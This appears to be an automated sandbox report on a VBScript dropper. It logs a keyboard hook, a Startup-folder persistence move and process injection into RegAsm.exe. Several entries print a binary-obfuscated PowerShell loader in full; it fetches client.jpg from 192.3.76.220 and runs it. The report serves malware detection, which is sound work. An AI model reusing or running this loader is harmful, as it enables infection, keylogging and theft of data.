SetWindowsHookExA Aug. 3, 2022, 10:07 a.m.	thread_identifier: 0 callback_function: 0x00408d29 hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00400000	1	655795	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Aug. 3, 2022, 10:06 a.m.	buffer: GET /client.jpg HTTP/1.1 Host: 192.3.76.220 Connection: Keep-Alive socket: 1420 sent: 72	1	72	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2100 called NtSetContextThread to modify thread in remote process 2592
NtSetContextThread Aug. 3, 2022, 10:07 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4398056 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000490 process_identifier: 2592	1	0	0

One or more non-whitelisted processes were created (5 events)

parent_process	powershell.exe	martian_process	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'
parent_process	wscript.exe	martian_process	Powershell $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
parent_process	wscript.exe	martian_process	Powershell Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 resumed a thread in remote process 2100
Process injection	Process 2776 resumed a thread in remote process 1660
Process injection	Process 2100 resumed a thread in remote process 2592
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x0000032c suspend_count: 1 process_identifier: 2100	1	0	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 1660	1	0	0
NtResumeThread Aug. 3, 2022, 10:07 a.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2592	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (28 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 3, 2022, 10:06 a.m.	thread_identifier: 2112 thread_handle: 0x0000032c process_identifier: 2100 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000334	1	1
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x0000032c suspend_count: 1 process_identifier: 2100	1	0
CreateProcessInternalW Aug. 3, 2022, 10:06 a.m.	thread_identifier: 1304 thread_handle: 0x00000220 process_identifier: 1660 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000334	1	1
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2100	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2100	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2100	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000574 suspend_count: 1 process_identifier: 2100	1	0
NtResumeThread Aug. 3, 2022, 10:07 a.m.	thread_handle: 0x00000578 suspend_count: 1 process_identifier: 2100	1	0
NtResumeThread Aug. 3, 2022, 10:07 a.m.	thread_handle: 0x00000450 suspend_count: 1 process_identifier: 2100	1	0
CreateProcessInternalW Aug. 3, 2022, 10:07 a.m.	thread_identifier: 2596 thread_handle: 0x00000490 process_identifier: 2592 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000498	1	1
NtGetContextThread Aug. 3, 2022, 10:07 a.m.	thread_handle: 0x00000490	1	0
NtAllocateVirtualMemory Aug. 3, 2022, 10:07 a.m.	process_identifier: 2592 region_size: 516096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000498	1	0
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $²¡-¢öÀCñöÀCñöÀCñB\²ñåÀCñB\°ñQÀCñB\±ñèÀCñÿ¸Çñ÷ÀCñh`ñôÀCñ[@ðìÀCñ[FðÌÀCñ[GðÔÀCñÿ¸ÐñáÀCñöÀBñÚÁCñCJð©ÀCñC¼ñ÷ÀCñCAð÷ÀCñRichöÀCñPELÆ¢æbà8èP@à¨¨ðP\|K 89`8ô@P¬.text78 `.rdataâqPr<@@.data$\Ð®@À.tls 0¼@À.gfids0@¾@@.rsrc\|KPLÂ@@.reloc89 :@B base_address: 0x00400000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: base_address: 0x00401000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: base_address: 0x00455000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ lEpEjE..pÑFLæFLæFLæFLæFLæFLæFLæFLæFLæFtÑFPæFPæFPæFPæFPæFPæFPæFxÑFÿÿÿÿpEÒFÒFÒFÒFÒFxÑFðEpE¸ªEØÑFp×FCPSTPDT ÒFàÒFÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZp×Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨3 F(A¬F-+A¸FL(AtVE.?AVtype_info@@tVE.?AVbad_alloc@std@@tVE.?AVbad_array_new_length@std@@tVE.?AVlogic_error@std@@tVE.?AVlength_error@std@@tVE.?AVout_of_range@std@@tVE.?AV_Facet_base@std@@tVE.?AV_Locimp@locale@std@@tVE.?AVfacet@locale@std@@tVE.?AU_Crt_new_delete@std@@tVE.?AVcodecvt_base@std@@tVE.?AUctype_base@std@@tVE.?AV?$ctype@D@std@@tVE.?AV?$codecvt@DDU_Mbstatet@@@std@@tVE.?AVbad_exception@std@@tVE.HtVE.?AVfailure@ios_base@std@@tVE.?AVruntime_error@std@@tVE.?AVsystem_error@std@@tVE.?AVbad_cast@std@@tVE.?AV_System_error@std@@tVE.?AVexception@std@@ base_address: 0x0046d000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: base_address: 0x00473000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: Æ«> : > >ùµ>ª¸½igiêK¾K þÀíÀÀ!h!>>VbUB ~ÕÅÏ Ëw&ãã I^L&þq¬b,Ýàcæ³èGävVÙe D)3. b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x00474000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: base_address: 0x00475000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: base_address: 0x0047a000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2592 process_handle: 0x00000498	1	1
NtSetContextThread Aug. 3, 2022, 10:07 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4398056 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000490 process_identifier: 2592	1	0
NtResumeThread Aug. 3, 2022, 10:07 a.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2592	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 3, 2022, 10:06 a.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 1660	1	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\8ae16271-0e6b-4817-88a8-469fd467cc94\AgileDotNetRT.dll

edi.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All